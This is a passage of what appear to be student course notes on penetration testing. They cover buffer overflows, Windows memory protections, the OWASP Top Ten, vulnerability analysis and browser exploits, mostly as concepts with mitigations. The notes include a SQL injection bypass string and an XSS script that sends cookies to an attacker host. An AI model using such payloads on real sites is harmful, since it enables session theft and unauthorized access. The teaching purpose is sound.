be tested. You should also specify what is off-limits (e.g., certain data, sensitive systems, or business-critical
services) to avoid unintended disruptions.
Identify Testing Environment: Ensure that the penetration test is performed in an environment that is
representative of the real system, without causing harm to production environments or user data.
Agree on Constraints: Make it clear what types of attacks or tactics are acceptable and where penetration
testers should not go, particularly in terms of legal boundaries (e.g., attacking critical production systems
without explicit consent).
2. Choose the Right Team
Internal or External Testers: Decide whether the penetration test will be performed by an internal security
team or an external third-party provider. External testers (often referred to as "ethical hackers") can provide
an unbiased perspective.
Qualifications and Experience: Ensure that the penetration testers have the necessary certifications (e.g.,
OSCP, CEH, CISSP) and experience to perform the tests effectively. This includes knowledge of the latest
attack methods and tools.
Collaboration with IT: Work closely with the internal IT team to ensure coordination. They can provide
insights about the systems, environments, and access controls, while helping with any potential recovery if
systems are disrupted during testing.
Managing a penetration test (pen test) is not just about performing technical activities; it also
involves planning, coordination, and communication with stakeholders. It requires a systematic
approach to ensure that all goals are met, and that the test is executed ethically, safely, and effectively.
This process involves various stages, from the initial planning phase to the final reporting phase.
ARJUNSAI
Cyber security 26
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
1. Planning a Penetration Test:
o Initial Scoping: Before starting a penetration test, it’s crucial to define the scope of the
test. This involves understanding the client’s objectives, the systems to be tested, and
the resources available. The scope should specify:
▪ Target Systems: Which systems, networks, or applications will be tested.
▪ Testing Methods: Whether the test will be black-box (no prior knowledge),
white-box (full access), or gray-box (limited access).
▪ Testing Hours: Specify whether the test will occur during business hours or
after hours.
▪ Rules of Engagement (RoE): Establish clear boundaries for the penetration test
to ensure that the testing does not affect the production environment.
o Example: A client may request testing of their public-facing web applications and a
limited internal network assessment.
2. Structuring a Penetration Test:
o Pre-Engagement Activities: This phase includes the contract agreement, setting
expectations, obtaining legal permissions, and defining what is in and out of scope.
o Reconnaissance: Collecting information about the target (e.g., domain names, IP
addresses, server types, software versions). Tools like whois, Nslookup, and Shodan
are commonly used.
o Vulnerability Scanning: Conducting vulnerability scans to identify known security
flaws in the target environment using tools like Nessus, OpenVAS, and Nmap.
o Exploitation: Once vulnerabilities are identified, ethical hackers attempt to exploit
them to gain unauthorized access.
o Post-Exploitation: After compromising a system, the attacker might gather sensitive
data, establish persistence, or escalate privileges to explore deeper levels of access.
3. Execution of a Penetration Test:
ARJUNSAI
Cyber security 27
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Reconnaissance Phase: In this phase, the penetration tester gathers information
(OSINT), scans the target network for open ports, and identifies potential entry points.
o Exploitation Phase: The tester uses tools and techniques to exploit identified
vulnerabilities and gain access to the system. This could include SQL injection, cross-
site scripting (XSS), buffer overflow attacks, etc.
o Post-Exploitation Phase: Once access is gained, the tester looks for ways to escalate
privileges, maintain access, and explore other parts of the network. The tester will also
look to exfiltrate data to understand what could be at risk.
4. Information Sharing During a Penetration Test:
o Communication is essential to ensure the right information is shared with the client.
The tester should document the vulnerabilities found, the exploitation process, and any
sensitive information accessed.
o Communication Channels: Clear channels (e.g., encrypted emails, secure file sharing)
should be used to prevent the exposure of sensitive information.
5. Reporting the Results of a Penetration Test:
o After the test is completed, a detailed report must be provided to the client. This report
should include:
▪ Executive Summary: A high-level summary of the findings, emphasizing the
potential risks without technical jargon.
▪ Technical Details: In-depth details on each identified vulnerability, the
methods used to exploit it, and the potential impact on the organization.
▪ Remediation Recommendations: Suggestions for mitigating the discovered
vulnerabilities, such as applying patches, configuring firewalls, or
implementing additional security measures.
o Report Examples: The report may include screenshots, logs, and detailed explanations
of how the exploitation was carried out.
ARJUNSAI
Cyber security 28
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Basic Linux Exploits
1. Stack Operations:
o In Linux, a stack is a region of memory that stores function calls and local variables.
When a function is called, a stack frame is created that holds the function’s local
variables, return address, and other data.
o Stack Overflow: A buffer overflow in the stack occurs when data exceeds the
allocated memory space, overwriting critical areas like the return address. This can be
exploited to take control of the program's execution flow.
2. Buffer Overflows:
o Buffer Overflow: This is one of the most common vulnerabilities in C-based
applications. A buffer overflow occurs when a program writes more data to a buffer
than it can hold, causing data to overwrite adjacent memory.
▪ Exploiting Buffer Overflows: Attackers can inject malicious code into the
stack or heap memory to overwrite the return address or function pointers,
allowing them to redirect program flow to malicious code (like a reverse shell).
o Techniques to Exploit Buffer Overflows:
▪ Stack Smashing: Overwriting the return address to execute arbitrary code.
▪ NOP Sled: Inserting a series of no-operation instructions (NOPs) to "slide" the
execution flow to the malicious code.
3. Local Buffer Overflow Exploits:
o These attacks occur when an attacker has access to a vulnerable application running on
the same machine. The attacker can exploit buffer overflows to execute arbitrary code
with the same privileges as the program.
ARJUNSAI
Cyber security 29
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Example: A vulnerable setuid program with improper bounds checking allows an
attacker to overwrite memory and escalate privileges.
Exploit Development Process:
o Identifying Vulnerabilities: The first step in exploit development is identifying a
vulnerability in the target program. This could be a buffer overflow, improper input
validation, or lack of encryption.
o Creating the Exploit: The next step is crafting a payload to take advantage of the
vulnerability. This often involves writing shellcode to perform specific tasks (e.g.,
opening a reverse shell).
o Testing the Exploit: Once the exploit is developed, it must be tested in a controlled
environment. The goal is to ensure that it works as expected without causing unintended
harm.
o Refining the Exploit: If the exploit does not work as expected, further refinement may
be needed, such as adjusting the shellcode or modifying how the exploit is triggered.
Windows Exploits
1. Compiling and Debugging Windows Programs:
o Compilation: The first step in developing an exploit for a Windows application is
compiling it in a vulnerable manner. Vulnerabilities such as buffer overflows, use-after-
free, or unvalidated input are common targets.
o Debugging: Tools like OllyDbg or Immunity Debugger are often used to debug
o Windows applications and analyze how a particular vulnerability works in memory.
ARJUNSAI
Cyber security 30
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
2. Writing Windows Exploits:
o Exploit development for Windows typically targets heap and stack-based
vulnerabilities, as well as memory corruption issues like use-after-free and integer
overflows.
o Techniques:
▪ Buffer Overflow Exploits: Similar to Linux, Windows applications can be
vulnerable to buffer overflows. The goal is to overwrite the return address or
function pointer to execute arbitrary code.
▪ Heap Exploits: Exploiting memory management flaws in the heap area.
Attackers can manipulate heap structures to overwrite function pointers or
redirect execution.
Understanding Structured Exception Handling (SEH):
o SEH is a Windows mechanism for handling exceptions and errors. Attackers can
exploit SEH to overwrite the exception handler with malicious code, effectively taking
control of program execution.
o Exploiting SEH: By overwriting the SEH handler with malicious code, attackers can
redirect program flow and execute arbitrary code.
What is a seh (structured exception handling) overwrite?
A seh (structured exception handling) overwrite is a type of buffer overflow attack that
exploits the structured exception handling mechanism in Windows operating systems.
It involves overwriting the exception handler address in the SEH chain, which allows
an attacker to take control of the program flow and execute arbitrary code.
What are the risks of a seh overwrite attack?
A seh overwrite attack can be used to execute malicious code on a victim's machine,
bypass antivirus and other security measures, and gain unauthorized access to sensitive
data. It can also cause system crashes and disrupt the normal functioning of the targeted
application or operating system.
ARJUNSAI
Cyber security 31
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
How can I protect my system from seh overwrite attacks?
To protect your system from seh overwrite attacks, you should keep your operating
system and applications up to date with the latest security patches and updates. You
should also use antivirus and other security software to detect and block malicious code.
Furthermore, you can use techniques such as code signing, data execution prevention
(DEP), and address space layout randomization (ASLR) to make it more difficult for
attackers to exploit vulnerabilities in your system.
How can I detect a seh overwrite attack?
Detecting a seh overwrite attack can be challenging, as this type of attack can be used
to bypass security measures such as antivirus and intrusion detection systems.
However, there are some signs that you can look for, such as abnormal program
behavior, crashes or timeouts, and unexpected network activity. You can also use tools
such as debuggers and system monitors to analyze the behavior of running processes
and detect anomalies. In addition, you can enable logging and monitoring features in
your operating system and applications to capture relevant events and data.
Understanding Windows Memory Protections (XPSP3, Vista, 7, and Server 2008):
1. Windows XP SP3 Memory Protections
Windows XP Service Pack 3 (SP3) includes several improvements to security, but it doesn't include
the advanced memory protections found in later versions like Vista or Windows 7. However, some
basic protections were implemented:
• Data Execution Prevention (DEP):
o DEP is a security feature that helps prevent code from executing in regions of memory that
should only contain data, such as the stack and heap.
o It prevents buffer overflow attacks where malicious code is injected into these regions and
executed.
ARJUNSAI
Cyber security 32
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o XP SP3 introduced hardware-based DEP (using the CPU’s NX bit) to enhance the protection
from these attacks.
• Address Space Layout Randomization (ASLR):
o ASLR is not available natively in Windows XP SP3.
o However, some programs and developers could enable ASLR in their applications if they
chose to use compatible compilers.
o ASLR randomizes the memory address locations of critical data structures and system
components, making it harder for attackers to predict the location of their malicious
payloads.
• Stack Protection:
o Stack-based buffer overflows were a significant threat before XP SP3.
o Windows XP SP3 introduced the /GS (Buffer Security Check) compiler option, which helps
detect stack-based buffer overflows by placing a canary value in the function’s stack frame.
o If an attacker tries to overwrite the return address on the stack, the canary value is altered,
and the application will terminate, preventing the exploit from succeeding.
2. Windows 7 Memory Protections
Windows 7 expanded on the security features introduced in Windows Vista, with more refined
control and enhanced memory protection mechanisms to thwart sophisticated attack techniques.
• Enhanced Data Execution Prevention (DEP):
o Windows 7 enforced DEP more thoroughly across both 32-bit and 64-bit versions. It also
added the ability to force DEP on more applications, improving overall system security.
o Hardware-enforced DEP was available on systems with supported CPUs (those with the NX
bit), protecting against exploits that tried to execute malicious code from non-executable
regions of memory.
• Advanced Address Space Layout Randomization (ASLR):
o ASLR in Windows 7 is more aggressive compared to Vista and covers both user-mode and
kernel-mode memory.
o The system DLLs, executable binaries, heap, and stack locations are randomized,
significantly making it harder for attackers to predict memory addresses for injecting
malicious payloads.
Windows Server 2008 Memory Protections
ARJUNSAI
Cyber security 33
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Windows Server 2008 (released around the same time as Windows Vista) included most of the same
memory protection mechanisms, but tailored for enterprise and server environments with a greater
emphasis on stability and protection against targeted attacks on servers.
• Data Execution Prevention (DEP):
o DEP was fully enforced in Windows Server 2008, and it extended across 32-bit and 64-bit
architectures.
o It works in tandem with the hardware’s NX bit to prevent attacks like buffer overflows from
executing malicious code in non-executable regions of memory.
• Address Space Layout Randomization (ASLR):
o Like Windows 7, Windows Server 2008 supported ASLR at both the kernel and user level.
The randomization of the memory layout made it much harder for attackers to exploit
vulnerabilities that relied on knowing the memory layout of key system components.
• PatchGuard:
o As in Windows Vista and 7, PatchGuard was included to protect the kernel and prevent
malicious rootkits or exploits from modifying the core operating system components.
o It ensured that the kernel remained untouched by unauthorized code modifications.
• User Account Control (UAC) and Integrity Levels:
o UAC was implemented to control the elevation of privileges and prevent unauthorized
access to high-privilege tasks.
o Windows Server 2008 allows administrators to configure policies for controlling UAC
prompts and limiting privilege escalation.
3. Bypassing Windows Memory Protections:
"Bypassing Windows Memory Protections" refers to the act of exploiting a vulnerability in
the Windows operating system to circumvent its built-in security features designed to protect
memory integrity, allowing malicious code to execute in a way that would normally be
prevented, often by manipulating memory access permissions or exploiting flaws in memory
management mechanisms like Data Execution Prevention (DEP) and Address Space Layout
Randomization (ASLR)
ARJUNSAI
Cyber security 34
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Return-Oriented Programming (ROP): ROP is a technique used to bypass memory
protections by chaining together small instruction sequences (gadgets) that already exist
in the executable memory.
o Heap Spraying: Involves filling the heap with malicious code, often used to bypass
DEP by making sure the attacker’s code ends up in a location where it can be executed.
ARJUNSAI
Cyber security 35
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
UNIT 4
Web Application Security Vulnerabilities:
Web application security vulnerabilities are weaknesses or flaws in a web application that can
be exploited by attackers to compromise the system, steal data, or perform malicious actions.
These vulnerabilities can range from issues related to the code, configuration, or design of the
application to improper implementation of security features.
Overview of Top Web Application Security Vulnerabilities:
Here’s an overview of the top web application security vulnerabilities that commonly expose
applications to threats and attacks:
1. SQL Injection (SQLi)
Description: SQL Injection occurs when an attacker inserts malicious SQL code into an input field (such as a
search bar or login form) in order to interact with the database behind the web application. The attacker can
manipulate SQL queries to retrieve, modify, or delete data.
Impact: Data theft, data modification, authentication bypass, and complete compromise of the database.
Prevention: Use parameterized queries, prepared statements, and stored procedures to prevent direct
interaction between user input and SQL queries.
2. Cross-Site Scripting (XSS)
Description: XSS happens when an attacker injects malicious scripts (usually JavaScript) into web pages
viewed by other users. These scripts can execute in the victim's browser and steal session cookies or redirect
users to malicious websites.
Impact: Session hijacking, phishing, defacement of content, and unauthorized actions on behalf of users.
Prevention: Sanitize user inputs, escape outputs, implement Content Security Policy (CSP), and use
frameworks that auto-escape data.
3. Cross-Site Request Forgery (CSRF)
Description: CSRF exploits the trust a web application has in the user's browser. An attacker can trick a
logged-in user into making an unintended request (e.g., changing account details) by embedding the
malicious request in a third-party website or email.
Impact: Unauthorized actions performed on behalf of an authenticated user, such as changing passwords,
transferring money, etc.
ARJUNSAI
Cyber security 36
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Prevention: Use anti-CSRF tokens, implement SameSite cookies, and ensure that state-changing requests
are POST and protected.
4. Broken Authentication
Description: Broken authentication vulnerabilities occur when an attacker can bypass authentication
mechanisms to gain unauthorized access to user accounts, applications, or sensitive data.
Impact: Account takeover, unauthorized data access, privilege escalation.
Prevention: Use strong password policies, implement multi-factor authentication (MFA), securely store
passwords (e.g., using salted hashes), and enforce session management best practices (e.g., session
timeouts).
5. Sensitive Data Exposure
Description: Sensitive data exposure occurs when sensitive information (e.g., passwords, personal details,
credit card numbers) is improperly protected, either in transit (not using encryption) or at rest (stored in an
unencrypted format).
Impact: Data theft, identity theft, financial loss.
Prevention: Encrypt sensitive data using SSL/TLS for data in transit and use strong encryption for data at
rest. Implement secure storage and key management practices for sensitive information.
6. Security Misconfiguration
Description: Security misconfiguration occurs when web applications, servers, or databases are not securely
configured, leaving them vulnerable to attacks. Examples include leaving default credentials in place,
exposing sensitive files, or misconfiguring cloud security settings.
Impact: Unauthorized access to systems, data leakage, increased attack surface.
Prevention: Regularly audit configurations, remove unused services, and ensure that default settings (e.g.,
passwords, permissions) are changed. Use automated security checks to detect misconfigurations.
7. Broken Access Control
Description: Broken access control vulnerabilities arise when an application fails to properly enforce user
permissions, allowing unauthorized users to access or modify resources they shouldn’t be able to.
Impact: Unauthorized access to restricted data, privilege escalation, data manipulation.
Prevention: Implement role-based access control (RBAC), validate user actions against their roles, and
ensure that sensitive data is protected at every layer (e.g., server, application, database).
8. Using Components with Known Vulnerabilities
Description: Web applications often rely on third-party components (e.g., libraries, frameworks) that may
have known security vulnerabilities. If these components are not regularly updated, they become a target
for exploitation.
Impact: Exploitation of vulnerabilities in outdated libraries or components, which may lead to system
compromise.
Prevention: Regularly update and patch third-party libraries and frameworks, use tools like OWASP
Dependency-Check to monitor for vulnerable components.
ARJUNSAI
Cyber security 37
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
9. XML External Entity (XXE)
Description: XXE vulnerabilities occur when an XML parser allows attackers to include external entity
references in XML data. This can result in disclosure of sensitive files, server-side request forgery (SSRF), or
remote code execution (RCE).
Impact: Data exposure, server compromise, denial of service (DoS).
Prevention: Disable external entity processing in XML parsers and validate XML input.
10. Unvalidated Redirects and Forwards
Description: Unvalidated redirects and forwards occur when an attacker can redirect a user to an untrusted
external website by exploiting the trust the application has in the user’s input (e.g., URL parameters).
Impact: Phishing attacks, social engineering, and malware distribution.
Prevention: Validate and sanitize URL redirects, use a whitelist of trusted destinations, and avoid direct user
control over redirection URLs.
o Web applications are widely used in today's digital ecosystem, but they are also
vulnerable to various security risks. Securing web applications is a critical part of
modern cybersecurity practices, as web vulnerabilities can be exploited to compromise
sensitive data, disrupt services, and cause significant damage.
ARJUNSAI
Cyber security 38
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o The OWASP (Open Web Application Security Project) maintains a list of the Top
Ten Web Application Security Risks. These risks represent the most critical
vulnerabilities in web applications, and understanding them is essential for both
penetration testers and developers.
2. Injection Vulnerabilities:
o Definition: Injection vulnerabilities occur when untrusted data is sent to
an interpreter as part of a command or query. This untrusted data can allow
attackers to inject malicious code that is executed by the application.
o Types of Injection:
▪ SQL Injection (SQLi): Attackers inject malicious SQL queries to manipulate
the database or extract sensitive data.
▪ Command Injection: Attackers inject system commands into an application,
allowing them to execute arbitrary commands on the server.
▪ LDAP Injection: Attackers inject LDAP queries to modify or gain
unauthorized access to directory services.
▪ XML Injection: Malicious XML data is injected to manipulate the behavior of
XML parsers.
ARJUNSAI
Cyber security 39
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Exploiting SQL Injection:
▪ Example: A user input field (e.g., a login form) that fails to sanitize input could
allow an attacker to enter a malicious SQL query like ' OR 1=1 --, which would
bypass authentication.
Mitigation:
▪ Use parameterized queries (prepared statements) to ensure user input is
treated as data rather than executable code.
▪ Employ input validation and escaping for user-supplied data to prevent
injection attacks.
3. Cross-Site Scripting (XSS) Vulnerabilities:
o Definition: XSS vulnerabilities occur when an application includes
untrusted data in the web page content returned to the user, allowing
attackers to execute scripts in the context of the user's browser.
o Types of XSS:
ARJUNSAI
Cyber security 40
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Stored XSS: Malicious scripts are stored in the server's database and later served to
users who view the compromised page.
o Reflected XSS: Malicious scripts are immediately executed when a user clicks on a
specially crafted URL.
o DOM-based XSS: (Document Object Model) The vulnerability exists in the client-side
code, where untrusted data is processed by the browser, executing the attack.
Exploiting XSS : Attackers can inject scripts that steal cookies, session tokens, or personal
information from users. For example, <script>document.location ='http://attacker.com?cookie=' +
document.cookie;</script> can be used to exfiltrate cookies.
ARJUNSAI
Cyber security 41
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Mitigation:
▪ Input Validation: Ensure that all user input is sanitized before being included
in HTML or JavaScript contexts.
▪ Content Security Policy (CSP): A security feature that helps prevent the
execution of unauthorized scripts.
▪ Output Encoding: Encode data before including it in the HTML output to
prevent browsers from interpreting it as code.\
▪ Sanitation: Filter away any dangerous components or attributes from HTML
code .Use online tools like HTML Sanitizer to sanitize HTML code online.
▪ Cookie Policies: Implement an Http Only cookie policy to prevent JavaScript
from having access to cookies.
4. The Rest of the OWASP Top Ten:
ARJUNSAI
Cyber security 42
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
The OWASP Top Ten represents the most critical web application security risks.
Some of the most important vulnerabilities (in addition to injection and XSS)
include:
o Sensitive Data Exposure: Insufficient protection of sensitive data, such as passwords
or personal information, during storage or transmission (e.g., using weak encryption or
no encryption at all).
o Broken Authentication and Session Management: Flaws in the authentication
process that allow attackers to compromise user credentials or bypass authentication
mechanisms.
o Broken Access Control: Insufficient restrictions on what authenticated users can do.
Attackers can exploit this to gain unauthorized access to resources.
o Security Misconfiguration: Misconfigurations in the application, server, or database
that can lead to vulnerabilities (e.g., default settings, unnecessary services).
o Cross-Site Request Forgery (CSRF): An attack where the attacker tricks a user into
making an unintended request to a web application in which they are authenticated.
o Using Components with Known Vulnerabilities: Using outdated libraries,
frameworks, or components that contain known security vulnerabilities.
o Insufficient Logging and Monitoring: Failure to monitor and log security events,
making it harder to detect and respond to attacks in real time.
ARJUNSAI
Cyber security 43
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Vulnerability Analysis: Vulnerability analysis is the process of identifying and evaluating
security vulnerabilities in a system, application, or network infrastructure. It helps in discovering
potential weaknesses before they can be exploited by malicious actors. The goal of vulnerability
analysis is to reduce the attack surface of a system and improve overall security.
Steps in Vulnerability Analysis:
• Identification:
• Discover vulnerabilities in the system using tools like vulnerability scanners, penetration
testing, and manual audits.
• Assessment:
• Analyze the severity and potential impact of identified vulnerabilities.
• Categorize vulnerabilities based on their likelihood of exploitation and the damage they can
cause (e.g., critical, high, medium, low).
• Remediation:
• Once vulnerabilities are identified and assessed, the next step is to fix or mitigate them. This
can include patching, configuration changes, or deploying compensating controls.
• Re-testing:
• After remediation, the system should be re-tested to ensure that the vulnerabilities have been
effectively mitigated
Types of Vulnerability Analysis
1. Passive Analysis:
ARJUNSAI
Cyber security 44
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Definition: Passive analysis involves observing and analyzing a system
without directly interacting with it. The goal is to gather information
without alerting the target or modifying the system.
Features of Passive Analysis:
• Non-intrusive: It does not alter or interact with the target system, making it a safe method.
• Data Collection: Passive analysis gathers data through available logs, network traffic,
configurations, and system responses.
• Stealthy: It does not alert the system or the target of its presence, which is especially useful in
sensitive environments.
o Techniques:
▪ Network Sniffing: Capturing network traffic to observe unencrypted data or
credentials. Tools like Wireshark or tcpdump can be used for passive network
analysis.
▪ Google Dorking: Using advanced Google search operators to find publicly
exposed information (e.g., vulnerable files, misconfigured servers, or outdated
software versions).
▪ Log Analysis: Reviewing system logs (e.g., firewall logs, intrusion detection
system logs) to spot any suspicious activity or vulnerabilities related to
authentication failures, access control issues, or misconfigurations.
Example: Searching for filetype:log or inurl:"admin" in Google to find
potentially sensitive log files or admin panels.
Advantages of Passive Analysis:
ARJUNSAI
Cyber security 45
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
• Minimal risk of disrupting system functionality.
• Doesn’t require system downtime or maintenance.
• Can identify vulnerabilities from an external perspective without needing in-depth access.
Disadvantages:
• Cannot identify vulnerabilities related to how the system handles active interactions or user
input.
• Limited to known vulnerabilities or issues that can be observed without active exploitation.
2. Source Code Analysis:
o Definition: Source code analysis involves reviewing the source code of an application
to identify security vulnerabilities before the code is deployed to production. This can
be done manually or using automated tools.
Methods of Source Code Analysis:
o Static Analysis: Analyzing the code without executing it, typically through the use of
tools such as SonarQube, Checkmarx, or Fortify.
o Manual Code Review: Reviewing the source code line by line to identify common
vulnerabilities like SQL injection, improper input validation, or insecure use of
cryptographic functions.
Example: Reviewing code to identify places where user inputs are concatenated
directly into SQL queries without proper parameterization, making the application
vulnerable to SQL injection.
Advantages of Source Code Analysis:
• Can identify vulnerabilities early in the development lifecycle, even before the application is
deployed.
• Provides a comprehensive review of potential vulnerabilities in the code.
ARJUNSAI
Cyber security 46
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
• Helps developers write more secure code by highlighting coding practices that lead to security
issues.
Disadvantages:
• Requires access to the source code, which may not be available for proprietary software.
• Can be time-consuming and may require specialized knowledge, especially for large or
complex codebases
3. Binary Analysis:
o Definition: Binary analysis involves examining compiled application
binaries (executables) to identify security vulnerabilities or backdoors.
This analysis can be done with tools like IDA Pro, Radare2, or Ghidra.
o Dynamic Analysis: Involves running the binary in a controlled
environment (e.g., a sandbox) to observe its behavior and identify potential
security risks.
o Reverse Engineering: The process of analyzing compiled code to uncover
how the application works internally. This is often used to uncover hidden
backdoors, security flaws, or exploitable vulnerabilities.
Advantages of Binary Analysis:
• Allows security testing without needing access to the source code.
• Useful for analysing closed-source software or third-party applications.
• Can uncover runtime vulnerabilities and memory issues that are not visible in source code
analysis.
Disadvantages:
ARJUNSAI
Cyber security 47
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
• Analysing compiled code can be complex, especially when the binary is obfuscated or packed.
• Requires a high level of expertise in reverse engineering and the tools used for binary analysis.
Tools for Vulnerability Analysis
Various tools are available for conducting vulnerability analysis, including:
• Vulnerability Scanners:
o Nessus, Qualys, OpenVAS, and Nexpose are widely used for automated vulnerability
scanning, which helps in identifying vulnerabilities in network services, web
applications, and hosts.
• Static Analysis Tools:
o SonarQube, Fortify, and Checkmarx are popular static application security testing
(SAST) tools that analyze the source code for vulnerabilities.
• Dynamic Analysis Tools:
o OWASP ZAP, Burp Suite, and Acunetix are dynamic application security testing (DAST)
tools used to identify vulnerabilities in running applications by simulating real-world
attacks.
• Binary Analysis Tools:
o IDA Pro, Ghidra, and Radare2 are used for analyzing compiled executable binaries to
identify potential vulnerabilities.
ARJUNSAI
Cyber security 48
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
UNIT 5
Client-Side Browser Exploits:
Client-side browser exploits are a critical aspect of penetration testing, as they target vulnerabilities
within the browser or associated technologies on the user's machine. These vulnerabilities can allow
an attacker to compromise a victim's system, steal data, or perform malicious actions. Browser exploits
are particularly effective because they can be triggered through seemingly innocent interactions with
websites, email links, or malicious ads, making them a common attack vector.
Here are some of the common client-side browser exploits:
1.Drive-By Downloads
Description: In a drive-by download attack, a user visits a compromised or malicious website, and the
website automatically downloads and executes malicious code on the user's machine, often without their
knowledge or consent.
Impact: Malware infection, data theft, system compromise, or use of the infected machine as part of a
botnet.
Prevention:
Keep browsers and plugins up to date.
Use click-to-play settings for Java applets, Flash, and other plugins.
Implement Content Security Policy (CSP) to restrict content sources.
Use antivirus software to detect malware downloads.
2.Clickjacking
Description: Clickjacking occurs when an attacker tricks a user into clicking on something different from
what they think they are clicking on. This is typically done by loading a transparent iframe over a legitimate
webpage. When the user clicks on a seemingly harmless button or link, they actually trigger an action in the
hidden iframe (such as changing their password or transferring funds).
Impact: Unauthorized actions performed by users, like changing account settings, performing transactions,
or revealing sensitive information.
Prevention:
Use X-Frame-Options HTTP header or Content Security Policy (CSP) frame-ancestors directive to prevent the
page from being embedded in iframes.
Avoid embedding sensitive actions in clickable elements that can be hidden.
ARJUNSAI
Cyber security 49
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
3. Malicious Browser Extensions
Description: Malicious or compromised browser extensions can exploit client-side vulnerabilities to steal
data, capture keystrokes, or inject malicious code into web pages.
Impact: Data theft, including login credentials, financial information, and browsing history. Extensions can
also modify page content or steal session tokens.
Prevention:
Only install extensions from trusted sources (e.g., official browser extension stores).
Regularly audit and review installed extensions.
Be cautious of extensions that ask for unnecessary permissions.
Keep extensions up to date to ensure any vulnerabilities are patched.
4. HTML5 Local Storage Exploits
Description: HTML5 introduced local storage and session storage to allow web applications to store data on
the client side. However, if an attacker can inject malicious scripts (via XSS or other vulnerabilities), they can
access and manipulate this stored data, such as session tokens or sensitive information.
Impact: Session hijacking, persistent data leakage, and cross-site data theft.
Prevention:
Avoid storing sensitive data in local storage (e.g., passwords, session tokens).
Use secure, encrypted cookies for storing session data.
Implement input sanitization to prevent script injection.
5. WebSockets Exploits
Description: WebSockets are used for full-duplex communication between clients and servers. If not
properly secured, WebSocket connections can be hijacked, or sensitive data can be intercepted by attackers
who can manipulate or eavesdrop on the traffic.
Impact: Data leakage, man-in-the-middle attacks, or unauthorized access to communication channels.
Prevention:
Use wss:// (WebSocket Secure) to encrypt WebSocket connections.
Perform authentication and authorization for WebSocket connections.
Validate user input to prevent injection of malicious data into WebSocket messages.
6. Browser Vulnerabilities (Zero-Day Exploits)
Description: Zero-day exploits target previously unknown vulnerabilities in browsers or browser plugins.
These vulnerabilities can be used by attackers to execute arbitrary code, gain control over the user's system,
or steal sensitive data.
Impact: Full system compromise, data theft, or remote code execution.
Prevention:
ARJUNSAI
Cyber security 50
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Regularly update browsers and plugins to patch known vulnerabilities.
Use browser sandboxing and isolation features.
Disable unnecessary or insecure plugins (e.g., Flash, Java).
1. Why Client-Side Vulnerabilities Are Interesting:
o Client-side vulnerabilities refer to flaws in applications that run on the user's
computer, such as web browsers, plugins, and other software. These vulnerabilities are
particularly interesting to attackers because they provide a direct way to exploit users,
bypassing network defenses like firewalls and intrusion detection systems.
o The client-side attack surface is rich due to the complex nature of modern web browsers
and the vast array of plugins (Java, Flash, PDF readers, etc.) that can be exploited.
o Attractive Targets: Client-side attacks can be difficult to defend against because they
often exploit weaknesses in widely used software, making them potentially effective
for a large number of users.
2. Internet Explorer Security Concepts:
o Internet Explorer (IE) was historically one of the most targeted browsers due to its
widespread use and frequent security vulnerabilities.
ARJUNSAI
Cyber security 51
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Over time, Microsoft introduced a range of security features in Internet Explorer to
mitigate client-side threats. Some of these features include:
▪ ActiveX Filtering: Prevents malicious ActiveX controls from running.
▪ Protected Mode: Limits the privileges of web applications to restrict what they
can do on the system.
▪ SmartScreen Filter: Identifies potentially harmful websites and blocks them
from being accessed.
▪ Enhanced Protected Mode: A security mechanism in IE to isolate browser
processes from the rest of the system.
3. History of Client-Side Exploits and Latest Trends:
o Historically, client-side exploits took advantage of vulnerabilities in widely used
browser plugins and browser features. For example, exploits targeted flaws in ActiveX
controls, Java applets, and Flash.
o However, with the decline of ActiveX and Flash, modern browsers have focused on
security mechanisms such as sandboxing, which isolates the browser from the
underlying operating system. Despite these advances, new vulnerabilities continue to
emerge in JavaScript engines, HTML5, and WebAssembly.
o Latest Trends in client-side exploits include targeting zero-day vulnerabilities
(previously unknown flaws) and use-after-free vulnerabilities, where the attacker
exploits the browser's handling of memory to execute arbitrary code.
4. Finding New Browser-Based Vulnerabilities:
o Exploit developers often look for vulnerabilities in web browser components, such as
the JavaScript engine, HTML5 features, and WebAssembly. These vulnerabilities
ARJUNSAI
Cyber security 52
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
may allow attackers to execute arbitrary code or access sensitive information from the
system.
o Common attack techniques include:
▪ Cross-Site Scripting (XSS): Injecting malicious scripts into web pages viewed
by other users.
▪ Use-After-Free: Exploiting issues with memory management to manipulate the
program’s execution.
▪ Heap Spraying: This technique involves filling the heap memory with
malicious data to increase the chances that the malicious code will be executed
by the browser.
Heap Spraying:
"Heap Spray Attacks" are a popular form of assault. Many malicious hackers seeking to
compromise computer systems and manipulate them for their own nefarious purpose often use
this strategy to exploit system vulnerabilities.
o The “heap” refers to a particular space within a computer's memory where dynamic
